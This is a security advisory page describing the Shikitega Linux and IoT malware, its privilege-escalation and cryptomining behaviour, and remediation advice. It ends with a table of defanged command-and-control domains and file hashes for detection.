- Home
- Alerts & Advisories
- Alerts
- New Shikitega Malware Targeting Linux Servers & Internet-of-Things
Alerts
New Shikitega Malware Targeting Linux Servers & Internet-of-Things
13 September 2022
A new Linux malware, dubbed Shikitega, is reportedly targeting both traditional servers and smaller Internet-of-Things (IoT) devices. It avoids detection by gradually delivering partial payloads with multiple decoding loops and having its command-and-control (C2) servers hosted on legitimate cloud services.
Shikitega has been observed to create a list of commands to be executed at a specified time to achieve persistence while remaining hidden. One such instance is the exploitation of two known privilege escalation Linux vulnerabilities, CVE-2021-4034 and CVE-2021-3493, to download, install, and execute a cryptominer with root privileges, before removing all downloaded files at a predetermined time. On top of that, Shikitega also downloads a Metasploit package, Mettle, which could potentially grant an attacker additional capabilities, including webcam control, credential stealing and multiple reverse shells.
Administrators and users are advised to promptly update their software/firmware whenever updates are released. Should you suspect your device to be infected, you may wish to perform an antivirus scan using an updated anti-malware application. In the case of suspected infection in an IoT device, the firmware may have to first be extracted before an anti-virus scan can be performed on the contents of the extracted file system. Possible indicators of compromise (IOCs) associated with Shikitega are shown in the table below:
Indicators of compromise
TYPE | INDICATOR | DESCRIPTION |
|---|---|---|
DOMAIN | dash[.]cloudflare[.]ovh | Command and control |
DOMAIN | main[.]cloudfronts[.]net | Command and control |
SHA256 | b9db845097bbf1d2e3b2c0a4a7ca93b0dc80a8c9e8dbbc3d09ef77590c13d331 | Malware hash |
SHA256 | 0233dcf6417ab33b48e7b54878893800d268b9b6e5ca6ad852693174226e3bed | Malware hash |
SHA256 | f7f105c0c669771daa6b469de9f99596647759d9dd16d0620be90005992128eb | Malware hash |
SHA256 | 8462d0d14c4186978715ad5fa90cbb679c8ff7995bcefa6f9e11b16e5ad63732 | Malware hash |
SHA256 | d318e9f2086c3cf2a258e275f9c63929b4560744a504ced68622b2e0b3f56374 | Malware hash |
SHA256 | fc97a8992fa2fe3fd98afddcd03f2fc8f1502dd679a32d1348a9ed5b208c4765 | Malware hash |
SHA256 | e4a58509fea52a4917007b1cd1a87050b0109b50210c5d00e08ece1871af084d | Malware hash |
SHA256 | cbdd24ff70a363c1ec89708367e141ea2c141479cc4e3881dcd989eec859135d | Malware hash |
SHA256 | d5bd2b6b86ce14fbad5442a0211d4cb1d56b6c75f0b3d78ad8b8dd82483ff4f8 | Malware hash |
SHA256 | 29aafbfd93c96b37866a89841752f29b55badba386840355b682b1853efafcb8 | Malware hash |
SHA256 | 4ed78c4e90ca692f05189b80ce150f6337d237aaa846e0adf7d8097fcebacfe7 | Malware hash |
SHA256 | 130888cb6930500cf65fc43522e2836d21529cab9291c8073873ad7a90c1fbc5 | Malware hash |
SHA256 | 3ce8dfaedb3e87b2f0ad59e1c47b9b6791b99796d38edc3a72286f4b4e5dc098 | Malware hash |
SHA256 | 6b514e9a30cbb4d6691dd0ebdeec73762a488884eb0f67f8594e07d356e3d275 | Malware hash |
SHA256 | 7c70716a66db674e56f6e791fb73f6ce62ca1ddd8b8a51c74fc7a4ae6ad1b3ad | Malware hash |
SHA256 | 2b305939d1069c7490b3539e2855ed7538c1a83eb2baca53e50e7ce1b3a165ab | Malware hash CVE-2021-3493 |
SHA256 | 4dcae1bddfc3e2cb98eae84e86fb58ec14ea6ef00778ac5974c4ec526d3da31f | Malware hash CVE-2021-4034 |
SHA256 | e8e90f02705ecec9e73e3016b8b8fe915873ed0add87923bf4840831f807a4b4 | Malware hash |
SHA256 | 64a31abd82af27487985a0c0f47946295b125e6d128819d1cbd0f6b62a95d6c4 | Malware shell script |
SHA256 | 623e7ad399c10f0025fba333a170887d0107bead29b60b07f5e93d26c9124955 | Malware shell script |
SHA256 | 59f0b03a9ccf8402e6392e07af29e2cfa1f08c0fc862825408dea6d00e3d91af | Malware shell script |
SHA256 | 9ca4fbfa2018fe334ca8f6519f1305c7fbe795af9eb62e9f58f09e858aab7338 | Malware shell script |
SHA256 | 05727581a43c61c5b71d959d0390d31985d7e3530c998194670a8d60e953e464 | Malware shell script |
SHA256 | ea7d79f0ddb431684f63a901afc596af24898555200fc14cc2616e42ab95ea5d | Malware hash |
IOCs derived from AT&T report
More information is available here:
https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux